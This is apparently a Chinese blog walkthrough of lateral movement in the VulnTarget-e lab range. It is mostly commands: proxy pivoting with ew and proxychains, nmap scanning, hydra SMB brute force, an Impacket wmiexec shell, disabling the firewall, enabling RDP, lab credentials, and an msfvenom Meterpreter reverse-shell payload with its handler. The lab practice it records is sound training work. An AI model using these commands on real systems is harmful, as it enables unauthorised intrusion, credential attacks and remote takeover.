0x01 前言
宝子们现在只对常读和星标的公众号才展示大图推送,建议大家把李白你好“设为星标”,否则可能就看不到了啦!
0x01 前言
以下是红蓝对抗靶场VulnTarget-e域内主机Win2008R2的打法。
涉及知识点
二级代理
内网横向
0x02 二级代理
ew.exe -s lcx_tran -l 2080 -f 192.168.100.131 -g 9999
proxychains scp -r -i key /home/z4pts/桌面/ew [email protected]168.100.131:/www/wwwroot/vulntarget-e2/ew
/root/ew -s ssocksd -l 9999 & //置于后台运行
vi /etc/proxychains4.conf
socks5 192.168.1.5 2080
proxychains curl http://192.168.88.100/
proxychains nmap -Pn -sT -p1-65535 192.168.88.102
proxychains hydra -l administrator -P password.txt 192.168.88.102 smb
0x03 内网横向
步骤四:根据以上爆破的结果使用Impacket中提供的wmiexec.py工具远程连接其命令执行环境获取交互式接口..
proxychains python3 wmiexec.py administrator@192.168.88.102
chcp 65001
步骤五:执行以下命令进行信息收集并开启关闭相对应的功能...
whoami //win-n4dk5rpd2qu\administrator
hostname //win-n4dk5rpd2qu
ipconfig /all //域:vulntarget.com 192.168.88.102/24 10.0.10.9/24
arp -a //10.0.10.10
netsh advfirewall set allprofiles state off //关闭防火墙
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f //开启3389端口
步骤六:在MSF上开启代理在外界windows主机上使用SocksCap64挂上代理访问远程桌面,如下成功!!!
开启代理
use auxiliary/server/socks_proxy
show options
run
主机信息
ip address:192.168.88.102
username:administrator
password:admin@123
0x04 上线MSF
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.88.100 LPORT=4444 -f exe > inside.exe
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.88.100
set lport 4444
run
0x05 往期精彩
VulnTarget-e边界主机权限获取【一】
红蓝对抗靶场VulnTarget-e之内网渗透【二】